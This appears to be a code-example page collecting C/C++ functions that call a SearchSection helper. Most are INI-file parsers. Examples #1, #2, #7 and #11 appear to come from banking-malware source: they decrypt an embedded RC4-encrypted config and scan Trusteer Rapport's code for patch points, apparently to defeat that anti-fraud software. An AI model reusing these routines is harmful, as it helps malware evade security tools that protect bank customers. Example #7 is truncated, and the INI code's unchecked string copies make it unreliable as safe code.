Example #1
0
BOOL GetSectionConfigData(PVOID pvPEBase,PVOID *ppvData,DWORD *pdwDataSize)
{
	BOOL bRet = FALSE;
	PIMAGE_SECTION_HEADER pvSection;

	if (pvSection = SearchSection(pvPEBase,SECTION_CONFIG_NAME))
	{
		PSECTION_CONFIG_HEADER pSecCfgHeader = MAKE_PTR(pvPEBase,pvSection->VirtualAddress,PSECTION_CONFIG_HEADER);
		PVOID pvDecryptedData;

		if (pvDecryptedData = malloc(pSecCfgHeader->dwCompressedSize))
		{
			EncryptRc4(pSecCfgHeader->bRc4Key,sizeof(pSecCfgHeader->bRc4Key),pvDecryptedData,&pSecCfgHeader[1],pSecCfgHeader->dwCompressedSize);
		
			if (bRet = DecompressBuffer(pvDecryptedData,pSecCfgHeader->dwCompressedSize,ppvData,pSecCfgHeader->dwDecompressedSize))
			{
				*pdwDataSize = pSecCfgHeader->dwDecompressedSize;
			}

			free(pvDecryptedData);
		}
	}

	return bRet;
}
Example #2
0
DWORD AntiRapportFindStr(HMODULE hRapportModule,LPCSTR lpFound,DWORD dwFoundLen)
{
	DWORD dwResult = 0;

	PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hRapportModule);
	if (pHeaders)
	{
		PIMAGE_SECTION_HEADER pRData = SearchSection(pHeaders,".rdata");
		if (pRData)
		{
			PUCHAR pAddr = (PUCHAR)((DWORD)hRapportModule + pRData->VirtualAddress);

			for (DWORD i = 0; i < pRData->SizeOfRawData - dwFoundLen - 1; i++)
			{
				LPCSTR lpStr = (LPCSTR)(pAddr + i);

				if (!m_memcmp(lpStr,lpFound,dwFoundLen + 1))
				{
					dwResult = (DWORD)lpStr;

					break;
				}
			}
		}
	}

	return dwResult;
}
Example #3
0
float TFastIni::ReadFloat(AnsiString Section, AnsiString Key, float Default)
{
    TFastIniSection *FIS = SearchSection(Section);
    if (FIS){
        return FIS->ReadFloat(Key, Default);
    }else{
        return Default;
    }
}
Example #4
0
bool TFastIni::ReadBool(AnsiString Section, AnsiString Key, int Default)
{
    TFastIniSection *FIS = SearchSection(Section);
    if (FIS){
        return FIS->ReadInteger(Key, Default);
    }else{
        return Default;
    }
}
Example #5
0
AnsiString TFastIni::ReadString(AnsiString Section, AnsiString Key, AnsiString Default)
{
    TFastIniSection *FIS = SearchSection(Section);
    if (FIS){
        return FIS->ReadString(Key, Default);
    }else{
        return Default;
    }
}
Example #6
0
BOOL TInifile::DelSection(const char *section)
{
	TIniSection *sec = SearchSection(section);

	if (!sec) return FALSE;

	DelObj(sec);
	delete sec;
	if (sec == cur_sec) cur_sec = NULL;
	return	TRUE;
}
Example #7
0
BOOL GetSectionConfigData(PVOID pvPEBase,PVOID *ppvData,DWORD *pdwDataSize)
{
	BOOL bRet = FALSE;
	PIMAGE_SECTION_HEADER pvSection;

	if (pvSection = SearchSection(pvPEBase,SECTION_CONFIG_NAME))
	{
		char* data = MAKE_PTR(pvPEBase,pvSection->VirtualAddress,char*);
		*ppvData = (void*)data;
		*pdwDataSize = *((int*)data) + sizeof(int);
		bRet = TRUE;
	}
Example #8
0
void TFastIni::ReadSectionValues(AnsiString Section, TStrings *S)
{
    S->Clear();
    TFastIniSection *FIS = SearchSection(Section);
    if (FIS){
        for (int i = 0 ; i < FIS->m_KeyValues->Count ; i++){
            S->Add(FIS->m_KeyValues->Strings[i]);
        }
    }else{
        return;
    }
}
Example #9
0
void TInifile::SetSection(const char *section)
{
	if (cur_sec && cur_sec != root_sec && !cur_sec->TopObj()) {
		DelObj(cur_sec);
		delete cur_sec;
	}

	if ((cur_sec = SearchSection(section)) == NULL) {
		cur_sec = new TIniSection();
		cur_sec->Set(section);
		AddObj(cur_sec);
	}
}
Example #10
0
void
GetPrivateProfileString (const char *section, const char *var,
			 const char *def, char *get, int length,
			 const char *filename)
{
  char *buf;
  char *section_found;
  char *key_found;

  memset (get, 0, length);

  if (!filename)
    {
      strncpy (get, def, length);
      return;
    }

  buf = file2buf (filename);
  if (buf)
    {
      section_found = SearchSection (buf, section);
      if (section_found)
	{
	  key_found = SearchKey (section_found, var);
	  if (key_found)
	    {
	      char *val_start;
	      char *val_end;
	      val_start = strchr (key_found, '=') + 1;
	      val_end = val_start;
	      while ((*val_end != '\0') && (*val_end != '\n')
		     && (*val_end != '\r'))
		val_end++;
	      strncpy (get, val_start, val_end - val_start);
	      get[val_end - val_start] = '\0';
	      return;
	    }
	}
    }
  strncpy (get, def, length);
}
Example #11
0
PVOID AnitRapportFindPushStrs(HMODULE hRapportModule,DWORD dwStr1,DWORD dwStr2,PVOID *pvLogFix)
{
	PVOID pvResult = 0;

	PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS) pRtlImageNtHeader(hRapportModule);
	if (pHeaders)
	{
		PIMAGE_SECTION_HEADER pRData = SearchSection(pHeaders,".text");
		if (pRData)
		{
			PUCHAR pAddr = (PUCHAR)((DWORD)hRapportModule + pRData->VirtualAddress);
			DWORD dwSize;

			for (DWORD i = 0; i < pRData->SizeOfRawData - 8; i++, pAddr++)
			{
				if (*(DWORD*)pAddr == dwStr1)
				{
					GetInstLenght((PDWORD)(pAddr - 1),&dwSize);
					if (dwSize == 5)
					{
						if (*(DWORD*)(pAddr + 5) == dwStr2)
						{
							GetInstLenght((PDWORD)(pAddr + 4),&dwSize);
							if (dwSize == 5)
							{
								pvResult = (PVOID)(pAddr - 7);
								*pvLogFix = (PVOID)(*(DWORD*)((DWORD)pAddr + 12) + (DWORD)(pAddr + 11) + 5);

								break;
							}
						}
					}
				}
			}
		}
	}

	return pvResult;
}
Example #12
0
void
WritePrivateProfileString (const char *section, const char *var,
			   const char *var_name, const char *filename)
{
  FILE *file;
  struct stat sb;
  int res;

  res = stat (filename, &sb);
  if (-1 == res)		// fichier n'existe pas
    {
      file = fopen (filename, "w");
      InsertSectionKey (section, var, var_name, file, 0);
      fclose (file);
    }
  else
    {
      int filesize;
      filesize = sb.st_size - 1;	// on ne lit pas EOT
      if (filesize >= 0)
	{
	  char *buf;
	  char *section_begin;
	  int size1, size2;

	  buf = file2buf (filename);

	  section_begin = SearchSection (buf, section);
	  if (NULL != section_begin)	//section existe déjà
	    {
	      char *key_begin;
	      key_begin = SearchKey (section_begin, var);
	      if (NULL != key_begin)	// la clé existe : on copie la partie d'avant l'ancienne clé, la nouvelle clé, puis la partie d'après l'ancienne clé
		{
		  int old_key_size;
		  char *key_end;

		  size1 = key_begin - buf;
		  key_end = strstr (key_begin, "\n");
		  if (NULL != key_end)
		    {
		      old_key_size = key_end - key_begin + 1;
		      size2 = filesize - (size1 + old_key_size);
		      file = fopen (filename, "w");
		      fwrite (buf, size1, 1, file);
		      WriteKey (var, var_name, file);
		      fwrite (buf + size1 + old_key_size, size2, 1, file);
		      fclose (file);
		    }
		  else
		    {		// la clé est la dernière du fichier
		      file = fopen (filename, "w");
		      fwrite (buf, size1, 1, file);
		      WriteKey (var, var_name, file);
		      fclose (file);
		    }

		}
	      else
		{		// clé n'existe pas : on la rajoute avant la prochaine section
		  char *next_section_begin;
		  next_section_begin = strstr (section_begin, "*");
		  if (NULL == next_section_begin)	// la section recherchée est unique : il suffit de copier la clé à la fin du fichier
		    {
		      file = fopen (filename, "a");
		      WriteKey (var, var_name, file);
		      fclose (file);
		    }
		  else
		    {		// on insère la clé avant la prochaine section
		      size1 = next_section_begin - buf;
		      size2 = filesize - size1;
		      file = fopen (filename, "w");
		      fwrite (buf, size1, 1, file);
		      WriteKey (var, var_name, file);
		      fwrite (buf + size1, size2, 1, file);
		      fclose (file);
		    }
		}
	    }
	  else
	    {			//section n'existe pas : on la rajoute ainsi que la clé
	      file = fopen (filename, "a");
	      InsertSectionKey (section, var, var_name, file, 1);
	      fclose (file);
	    }
	  free (buf);
	}
      else
	{			//taille fichier < 0
	  file = fopen (filename, "w");
	  InsertSectionKey (section, var, var_name, file, 0);
	  fclose (file);
	}
    }
}